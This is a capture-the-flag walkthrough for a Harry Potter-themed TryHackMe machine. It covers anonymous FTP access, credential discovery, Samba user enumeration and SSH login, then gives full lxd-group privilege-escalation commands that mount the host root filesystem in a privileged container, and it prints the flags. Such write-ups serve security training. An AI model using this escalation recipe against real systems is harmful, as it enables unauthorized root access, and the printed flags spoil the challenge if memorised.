This post is the official write-up for the Chamber of Secrets-themed machine used in Sacramentum CTF. You can find these machines on Tryhackme.
Let’s get started by deploying the machine. Now, after deploying the machine, start with a basic Nmap scan and see which ports and services are open and running on the particular IP address.
nmap -sC -sV 10.10.79.75 -vv
In this case, FTP is running, so let's try to connect with the user 'anonymous' and leave the password blank.
Anonymous connection works and we found quite some information in FTP, a file (passwd.txt), and 2 hidden folders ('.GodricGryffindor' and '...')
Let's go ahead and see what the password file contains.
This looks like a base64, let's decode it from base64decode
Looks like we found a possible user - Harry.
The folder '.GodricGryffindor' has a file Sword.txt which contains our first flag 'Ch4mb3r0fS3cr3ts{Al4rt3_A5c3nd@r3}'
Now if we check the '...' folder, there is another passwd.txt file that contains a string '1_4m_Th3_Ch0s3n_0n3' which can be our password.
Trying to connect to FTP and ssh without tentative user 'Harry' and password '1_4m_Th3_Ch0s3n_0n3' doesn't get us anywhere.
Let's move on and focus on the Samba service by enumerating it using enum4linux.
No important information here.
No peculiar shares are available.
Voila! We found all the users.
Let's try these users with our password '1_4m_Th3_Ch0s3n_0n3'.
The creds - 'h4rry':'1_4m_Th3_Ch0s3n_0n3' work and we connect to ssh where we find our second flag - 'Ch4mb3r0fS3cr3ts{D3v1Ls_5n4R3}'
After this while trying basic methods of PrivEsc, we find that 'h4rry' is part of lxd group. If you don't know about lxd, you can read about it here.
On some research, we can find that we can use lxd to gain root access to the file system by creating an lxd container and mounting the whole file system of the machine to the container.
Commands for lxd PrivEsc -
ON ATTCKER MACHINE
1. Cloning the required image builder
git clone <https://github.com/saghul/lxd-alpine-builder>
2. cd lxd-alpine-builder
3. building the image
./build-alpine
4. Initialize a server to transfer tar file.
python -m SimpleHTTPServer 80
ON VICTIM MACHINE
1. wget the tar file formed on the attacker machine
2. Importing the image file
lxc image import 'InsetTarFile' --alias privesc
3. Initializing an lxd container
lxc init privesc privesc-container -c security.privileged=true
4. Mounting the file system to lxd container
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start privesc-container
6. lxc exec privesc-container /bin/sh
You can find a detailed explanation of lxd escalation here.
The root flag is in /mnt/root/root folder - 'Ch4mb3r0fS3cr3ts{1_4m_L0rd_V0ld3m0rt}'
If you liked this writeup there are many more writeups like this here.
Sometimes we include links to online retail stores and/or online campaigns. If you click on one and make a purchase we may receive a small commission.
Comments: